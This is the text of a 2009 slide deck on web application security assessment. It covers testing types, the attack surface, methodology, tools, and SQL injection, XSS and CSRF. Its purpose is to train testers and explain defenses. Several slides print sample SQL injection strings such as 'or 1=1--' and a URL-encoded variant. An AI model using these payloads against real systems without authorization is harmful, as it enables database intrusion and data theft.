A D V I S O R Y S E R V I C E S Web Application Assessment March 2009
Agenda Definitions Landscape of current web applications Required skills Attack surface Scope Methodology Soft skills 2
Definitions Black box testing White box testing Grey box testing What about code reviews? 3
Landscape Typical Application Client Javascript, VB, ActionScript AJAX/JSON user experience Server C#, VB, PHP, Java, ColdFusion, Perl, Ruby Web services SOAP, WSDL, UDDI Database Oracle, MySQL, MS SQL, Postgres LDAP AD, Novell, Sun Does this list scare you? 4
All this and more RegEx URL, Hex, Base64, Unicode encoding HTML encoding SQL syntax XML LDAP All of this in addition to the basics like HTML, CSS, HTTP, HTTPS, IIS/Apache, SSL 5
RegEx Examples ^SELECT S%65L%65CT ^(?!000)([0-6]\d{2} 7([0-6]\d 7[012]))([ -]?)(?!00)\d\d\3(?!0000)\d{4}$ '[0-9]\{1,3\}\.[0-9]\{1,3\}.[0-9]\{1,3\}.[0-9]\{1,3\}' 6
Encoding Examples or 1=1 %27%6f%72%20%31%3d%31%2d%2d password cgfzc3dvcmq= 7
Attack Surface Client Browser, AJAX, Flash, Plugins Server Web server (Apache, IIS, Sun One) Web Application Forms Cookies Query parameters File upload/download Contact Us functionality Business logic Concurrency Web services 8
Start with the Scope Take a monumental task, and confine it URL or IP Address Client-side, or just server/application? What to test for? How to perform those tests? 9
Methodology Reconnaissance Document Mapping Document Plan Document Test Document Exploit Document 10
Reconnaissance External (e.g. Google) From the site Platform (e.g. Windows/IIS) Development technology(ies) (e.g..net with JavaScript) SSL and weak ciphers Robots.txt and crossdomain.xml Map the application (spider) Enumerate directory/files Determine functionality Locate entry points Look for comments and hidden fields 11
Tools Landscape Gooscan Fierce Maltego Web Scanners Nikto Burp Appscan Hailstorm Focussed tools General Web Assessment Tools Burp Suite WebScarab Firefox Addons Firebug & Firecookie TamperData JSView OWASP LiveCD Samurai HTTPrint Wmap DirBuster SSLDigger 12
Post Information Gathering Analyze accumulated results from all tools Document the application Look for areas of vulnerability: Authentication/Authorization Cookie Attributes Expires, Path, Domain, and Secure Traversal Injection XSS CSRF Application logic Concurrency Race Conditions 13
Post Information Gathering (2) Determine how users are authenticated, and look for user contexts to reverse engineer the authorization scheme Document the important web functions, associated pages, and parameters Document the application and logic flow Use all of this information to create a plan of exploit, to seek out vulnerabilities 14
Finding the Cool Stuff Automated vs Manual Let s avoid the flame wars! This is where the methodology helps Let the automated tools do some of the digging and heavy lifting for you That still leaves plenty for you to manually test 15
What is the cool stuff? Injection XSS CSRF 16
SQLi Assumptions: You know the basics of SQL You know the basics of SQLi 3 Classes: Inband Out of band Inferential How do you test for it? How do you validate? 17
SQLi Starts at Home Source: http://xkcd.com/327/ 18
SQL Injection Types Error Ask the DB a question that will produce an error, and examine the error to glean information. Union Use SQL Union statement to combine two Select statements. Useful for data extraction Blind Ask the DB only True/False questions, and measure the response based on the type of page returned, or the time it took to respond. 19
SQLi Tools Mieliekoek.pl Will use the output from HTTrack for its target list; Looks for ODBC in the output; Configurable SQLi syntax SQLMap Python command line tool; Blind and Union SQLi; Can use Burp or WebScarab logs for targets list Wapiti Set of Python scripts for testing SQLi, CRLF, XSS, and others; Absinthe GUI tool that can aid in the download of schema and contents of a database; Does not find SQL injection points; Uses blind injection techniques or error based for SQL Server SQL Inject Me Firefox addon to test for error based SQLi SQLiX OWASP Perl command line tool to test for error based and blind SQL injection; It can run exploits as well SQL Power Injector -.Net based tool to find and exploit SQLi; Focuses on blind injection, but does not try to locate the vulnerability 20
Mitigating and Preventing SQLi Validating input or 1=1-- or 2=2-- or 1 in (select @@version)-- Parameterized queries Stored procedures really? Web application firewalls really? 21
Other Injection Types LDAP XPATH OS Tools? How do you test for it? 22
Cross Site Scripting (XSS) Reflected vs. Stored Which is more dangerous? DOM-based XSS How do you test for these? Automated tools? 23
Cross Site Request Forgery How does this differ from XSS? Subtle Preventable How do you test for it? 24
XSS and CSRF Understand Same-Origin Policy Understand Adobe s recent Cross-domain policy Understand the nuances of these policies, and how different browsers interpret those nuances 25
Soft Skills Documentation Understand risk, business risk Communication Scope Testing windows, methodology, etc. Expectations Time management 26
References: Advanced SQL Injection In SQL Server Applications by Chris Anley (NGS Software) Advanced SQL Injection by Joe McCray Web Application Disassembly with ODBC Error Messages by David Litchfield Cross Site Scripting Explained by Amit Klein Cross Site Request Forgeries: Exploitation and Prevention by Zeller and Felton OWASP Web Site OWASP Testing Guide v3 27